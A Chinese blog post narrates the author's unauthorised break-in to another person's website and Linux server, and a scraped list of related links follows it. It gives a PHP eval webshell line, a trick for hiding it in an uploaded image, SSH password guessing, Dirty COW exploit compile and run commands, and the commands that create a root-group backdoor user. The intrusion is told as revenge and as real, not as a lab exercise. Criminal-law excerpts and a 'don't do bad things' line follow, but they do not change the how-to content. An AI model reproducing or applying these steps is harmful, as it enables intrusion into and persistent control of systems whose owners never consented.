lunix入侵别人电脑_记录一次Linux的实战入侵过程
注:本人是个菜鸟。
一、利用文件上传漏洞获取webshell。
确定要攻击的目标网站。
图上的目标站域名过期了,只能通过ip地址访问。
大概在去年的时候,对目标站实施了入侵,具体如下:
本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。而且有个默认的头像。通过右键查看图片得到当前图片路径。
这回知道了路径。那么就开始吧。
通过浏览目标站,得到目标站使用php语言。先准备一个php一句话木马 <?php @eval($_POST[pp]);?>。直接上传。那肯定是不成功的,校验了后缀格式。那么把 .php一句话木马后缀改为.jpg。在上传,使用brupsuite 抓包 再更改后缀为php,还是失败。既然普通的php码不能上传,那么就制作一个图片一句话木马。在图片里面植入一句话木马。
直接上传制作好的图片木马。提示上传成功。右键查看我们上的木马图片。发现名称已经被替换成14828287266_3_image.jgp 这个。直接复制图片地址,使用中国菜刀进行连接木马,连接失败,不知道啥原因。百度搜索发现 IIS6.0有文件上传解析漏洞 如:1.php;2.jpg,是图片,但是在IIS6.0里解析的时候,是忽略掉分号后面的字串,直接解析为1.php,抓包再使用00截断上传,还是无果。正要放弃的时候,想到一个方法,将一个普通的图片直接右键编辑,在最底下加入php一句话木马,上传成功,使用中国菜连接居然连接上了。
在通过访问这些目录找到目标站的数据库配置信息。
获取目标站的数据库。连上数据库简单的看了下mysql版本为5.7.11。
本来还想着利用mysql的system命令执行shell。结果这个版本没有这个命令
mysql> system ls;
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'system ls' at line 1
那么直接利用菜刀,上传一个php大马,来反弹一个shell。
访问php大马。
可以查看到当前服务器的版本信息。及所有用户。
那么剩下了就是怎样提权了,当时对linux提权不是很熟,所有暂时先放下了。
今年偶然也去目标站看看清况,看看我上传的大马有没有被管理员删除,直接访问网站,发现域名过期了,无法访问,再百度搜索该网站也搜不到,突然发现一篇帖子发现该网站管理员挺坏的啊。
那么通过ping ip 看到服务器没有关闭。直接把域名换成ip访问大马,访问成功,看来管理员已经放弃了这个服务器。既然这个网站管理员这么坏,当然要搞他一波。
二、liunx提权
利用php大马看一下服务器版本为 linux 2.6.32-573.22.1 当前用户为 apache
先上传一个 nc 来反弹当前shell 结果执行报错。
既然nc用不了。那么直接用ssh 直连。简单猜测一下 root 密码。
结果ssh一直连不上。通过端口扫描器,就只扫描到了80端口。
我严重怀疑这个管理员修改了22端口。百度怎么修改22端口 发现在这个文件保存着端口信息 /etc/ssh/sshd_config 打开看看,发现管理员修改了端口为2222
得到端口使用xshell工具用root账号简单的猜测了一下密码,无果。那么就试试普通用户。
发现一个用户名跟目标站的域名一样。果断通过这个用户名 进行ssh连接,简单的使用了几个密码尝试了一下后,就输入用户名当作密码,竟然连上了。那么接下来就利用这个普通用户进行提权。百度一波linux提权,看到gcc编译漏洞普通用户提权为root比较简单,就按照这个方式进行提权
执行到最后一行命令的时候。LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3。就直接断开连接了。尝试几次之后果断放弃。
在百度了一波后发现脏牛linux 漏洞对于2.6.22以上版本都有影响。刚好目标站版本为2.6.23。符合提权环境。脏牛Linux本地提权漏洞复现(CVE-2016-5195)www.jianshu.com
那么下载exp文件,上传到目标站的tmp目录(这里我用的是这个exp 也就是dirty.c文件)执行按照命令依次运行
1、 gcc -pthread dirty.c -o dirty -lcrypt
2、 ./dirty 密码 (这里的密码自己定义)
大概等个几分钟。看到这段就说明成功了。这里firefart就是root权限的用户。密码就是刚刚运行的 ./dirty 密码 (自己输的密码)
果断切换用户 su firefart 执行id查看当前权限。已经是root权限了。提权成功!
接下来肯定是创建一个用户并赋予root权限啦
useradd ceshi
passwd ceshi
usermod -g root ceshi
成功执行!
《中华人民共和国刑法》
第二百八十五条
【非法侵入计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
【非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
【提供侵入、非法控制计算机信息系统程序、工具罪】提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。
第二百八十六条
【破坏计算机信息系统罪】违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。
结尾:不要干坏事哦!
lunix入侵别人电脑_记录一次Linux的实战入侵过程相关推荐
- kali装电脑_教你Kali Linux怎么安装Nessus软件
Nessus是系统漏洞扫描与分析软件,但Nessus在Kali Linux上的安装可不简单,没有提供一个图形化的安装借口,下面小编就给大家介绍下如何在Kali Linux上安装Nessus. 用w3m ...
- vector容器动态申请内存的过程_记录一次自定义Allocator profile的过程
交代背景 最近组里小伙伴通过组播技术实现发送同一报文到多个接收者,Receiver端会申请内存接收UDP数据包并存入指定Queue中,待用户从Queue中取出数据后会将这块内存回收.上述数据发送功能主 ...
- qq远程控制电脑方法_【技术分享】教你远程控制别人电脑
大家好呀,欢迎小伙伴们观看文章,希望小伙伴们多多点赞分享加关注,并且小伙伴们可以动动小手将本公众号添加到星标,星标可以第一时间收到本公众号的消息哦~ ◆ ◆ ◆ 技术分享 分享是一种美德 乐人之乐 ...
- 如何清除计算机主机日志,如何清除电脑使用记录_如何清除电脑使用日志
2016-12-10 12:30:24 一.如何查看电脑开机记录 1.打开"我的电脑",C盘Windows目录下有很多文件,找到一个SchedLgU.txt(或者开始-运行Sche ...
- 《黑客大曝光:移动应用安全揭秘及防护措施》一3.4 入侵别人的iPhone:再次释放心中的怒火...
本节书摘来自华章出版社<黑客大曝光:移动应用安全揭秘及防护措施>一书中的第3章,第3.4节,作者 (美)Neil Bergman ,更多章节内容可以访问云栖社区"华章计算机&qu ...
- 腾讯视频下载电脑_腾讯视频如何设置允许腾讯视频驻留功能
本文给大家整理了腾讯视频下载电脑_腾讯视频如何设置允许腾讯视频驻留功能方面的内容.腾讯视频不断实践"三网合一"的使命,现已覆盖互联网.电视.移动三大终端,兼具影视.综艺.资讯三大内 ...
- window7调用计算机,教你查看win7系统电脑使用记录的具体方法
有时候会不在电脑旁边,不知道电脑是否有被别人使用过,因为里面储存有很多重要的资料.这时候可以查看win7系统电脑使用记录来确定别人是否有使用过电脑.电脑使用记录着开机关机使用时间,上网实用记录等.接下 ...
- 计算机开关机操作记录,win7电脑操作记录怎么查看|win7查看电脑操作记录的方法...
我们都知道只要有操作过Win7电脑都会留下记录的,比如浏览了什么网页.看过什么视频都会留下操作记录的.但是win7电脑操作记录怎么查看?一些用户对此问题表示非常好奇,有时候电脑借给别人使用,想知道自己 ...
- 计算机管理日志清除怎么清除,电脑使用记录清除技巧大全
我们知道,自进入Windows系统后,Win 9X/2000/XP中的一切操作都将被记录并保存在硬盘中.此项功能原本是系统设计者为方便用户设置的,但没想到会成为泄露电脑信息的漏洞.窥探者在用户刚用过的 ...
- 怎么查看台式计算机系统,如何查看电脑使用记录,简单几步就能看到
很多时候我们的电脑会借给同事或者朋友使用,别人使用了我们的电脑会有操作记录,那么如何查看电脑使用记录呢?今天小编告诉你一个方法简单几步就能看到电脑使用记录的情况,有需要的朋友可以学习下次可能有用哦. ...
最新文章
- hdu 1584蜘蛛牌(DFS)
- libnghttp2 NDK 交叉编译
- 怎么设置电脑屏幕一直亮着_电脑屏幕出现条纹是什么原因 花屏怎么解决?
- 解决VS2010复制代码中文乱码的问题
- 阿帕奇跨域_阿帕奇骆驼遇见Redis
- C++ new/new operator、operator new、placement new初识
- 课堂练习之小强大扫荡
- 小米 OV 联合起来才不是为了对抗 Google!
- 精英讲师培训笔记01-提升口才的三个心法
- 如何实现ArcSDE的集群功能
- Slog86_使用Sketch 设计ArthurSlog网站主页原型
- 关于CS61b sp21中proj0的问题
- C语言游戏开发——反弹球
- 斯坦福课程Knowledge Graphs-What is a Knowledge Graph?
- 误删除数据恢复 plsql
- [Codeforces 274E]:Mirror Room(模拟)
- 别人总结归纳很全的三方库
- IMPERVA-WAF 更换网卡
- zookeeper的脑裂问题
- 场景应用移动支付的另类体验
热门文章
- java 8 64位官方下载_Java 8下载 Java 8.0U181官方正式版(32位/64位) 下载-脚本之家
- 【CarMaker学习笔记】Simulink内的子模块详细介绍
- Navicat for mysql破解版安装步骤
- SpringBoot 快速整合 QuartZ
- wer 流程图编程_WER机器人搭建学习实操练习
- 【问链财经-区块链基础知识系列】 第十六课 区块链将变革教育产业,未来有六大应用方向
- ROST_CM6软件之词频分析、社会网络和语义网络分析、情感分析
- android 包名工具,查看包名(安卓应用包名查看工具)
- [转]MapX 操作总结
- 用命令连接其他计算机名,如何使用命令连接远程桌面?